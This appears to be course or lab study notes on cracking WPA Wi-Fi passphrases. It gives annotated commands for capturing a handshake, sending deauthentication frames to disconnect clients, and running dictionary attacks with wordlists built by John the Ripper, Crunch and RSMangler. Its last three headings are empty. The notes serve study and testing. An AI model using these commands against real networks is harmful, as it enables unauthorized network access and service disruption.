Cracking Authentication Hashes

# Capture on channel 3 (-c), filtered to one ESSID/BSSID, to record the WPA 4-way handshake.
# -w wpa sets the output prefix; the capture used below is wpa-01.cap.
sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon
# Send one deauthentication (-0 1) to a single associated client (-c) of the AP (-a).
# NOTE: deauth frames are unauthenticated management frames; a network that enforces 802.11w (PMF) has its clients ignore them.
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon
# Same request without -c, so it is addressed to every client of the AP rather than one station
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 wlan0mon
# Offline dictionary attack on the captured handshake: each candidate from the wordlist (-w) is tested locally against wpa-01.cap.
# NOTE: nothing is sent to the AP at this stage, so AP-side lockout or rate limiting does not apply; only passphrase strength resists it.
aircrack-ng -w /usr/share/john/password.lst -e wifu -b 34:08:04:09:3D:38 wpa-01.cap
# Confirm the recovered key by decrypting the captured traffic with airdecap-ng (or in Wireshark).
# NOTE: -p puts the passphrase on the command line, where it ends up in shell history and the process list.
airdecap-ng -b 34:08:04:09:3D:38 -e wifu -p 12345678 wpa-01.cap

Custom Wordlists

=> John the Ripper
# Edit John's mangling rules in its configuration file
sudo nano /etc/john/john.conf
# Check that the rules produce an expected candidate: print the mangled words to stdout
# and search them (case-insensitively) for Password123
john --wordlist=/usr/share/john/password.lst --rules --stdout | grep -i Password123
# Stream the mangled candidates straight into aircrack-ng; "-w -" reads the wordlist from stdin,
# so no intermediate wordlist file is stored
john --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -e wifu -w - ~/wpa-01.cap

=> Crunch
@ : represents lowercase characters or characters from a defined set
, : represents uppercase characters
% : represents numbers
^ : represents symbols
# Generate 11-character words that start with 'password' and end with 3 digits.
# The three @ draw from the character set given on the command line (0123456789), which is why they yield digits here.
crunch 11 11 0123456789 -t password@@@
# Generate the permutations of the characters in 'abcde12345', using each character once per word.
# With -p the min/max lengths must still be given but are ignored.
crunch 1 1 -p abcde12345
# Same with whole words instead of characters: permutations of the listed words, none repeated
crunch 1 1 -p dog cat bird
# Permute the words and append two characters from the defined set 'aADE':
# in the -t template, characters other than @ , % ^ (here ddd) stand for the permuted words, and each @ takes a character from 'aADE'
crunch 5 5 aADE -t ddd@@ -p dog cat bird
# Generate password000 through password999 (% = digit) and pipe them to aircrack-ng; "-w -" reads the wordlist from stdin
crunch 11 11 -t password%%% | aircrack-ng -e wifu crunch-01.cap -w -

=> RSMangler
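# Build the seed wordlist, one word per line.
# A single redirect is used on purpose: repeating '>' for each word truncates the file every time and leaves only the last word.
printf '%s\n' bird cat dog > wordlist.txt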
# Mangle the seed words with RSMangler, keep candidates of 12 to 13 characters (--min/--max),
# and pipe them to aircrack-ng; "-w -" reads the wordlist from stdin
rsmangler --file wordlist.txt --min 12 --max 13 --allow-duplicates | aircrack-ng -e wifu rsmangler-01.cap -w -

=> aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
=> standards-oui.ieee.org/oui/oui.txt
=> wireshark.org/tools/oui-lookup.html

Hashcat

Airolib-ng

coWPAtty
